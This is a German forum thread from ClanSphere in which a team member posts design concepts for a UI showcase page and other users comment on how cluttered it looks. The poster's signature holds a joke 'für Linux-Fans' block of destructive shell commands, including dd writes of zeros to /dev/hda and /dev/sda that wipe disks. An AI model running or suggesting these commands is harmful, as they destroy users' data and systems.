Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 4
Seite [1]
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Thema - 17.01.2010 um 05:48 Uhr
Passend zu seinem neuen Benutzerinterface möchte er auch eine ansprechende Seite mit der er sein neues UI vorstellen kann.
Nun...

http://clients.maydia.org/lui/design/concept_01.png

http://clients.maydia.org/lui/design/concept_02.png

Bei dem Nr.2 ist nur ein wenig mehr um die linke Seite der Navigation, mehr nicht.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443
Inaktiv
Pred


Poststar




Herkunft: Bischofsmais
Beiträge: 762
# Antwort: 1 - 17.01.2010 um 09:18 Uhr
heiligs keksle... das sieht ja schonma geil aus... wennu den rest der Seite auch noch so hinbekommst, dann gz


------------------


Inaktiv
|
1a Schnitzel


Going for pro





Beiträge: 518
# Antwort: 2 - 17.01.2010 um 12:52 Uhr
Bin ich wohl zu alt für, ist mir dann doch zu stylisch.
Finde da sind einfach zu viele Ebenen/Grafiken/Effekte übereinander wodurch eine klare Linie/Struktur schwer erkennbar wird.

Sieht zwar echt klasse aus, aber für ne Seite ist das Design meiner Meinung nach zu überfrachtet und lenkt zu sehr vom eigentlichen ab.


Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 3 - 17.01.2010 um 13:07 Uhr
Kann damit auch nicht wirklich was anfangen, ist für mich einfach jetzt schon zu überladen.

Aber die Arbeit ist trotzdem top


Inaktiv
|
Aik0n


Rock the board




Beiträge: 64
# Antwort: 4 - 19.01.2010 um 11:48 Uhr
@equal

/sign


Inaktiv
|
Antworten: 4
Seite [1]


Sie müssen sich registrieren, um zu antworten.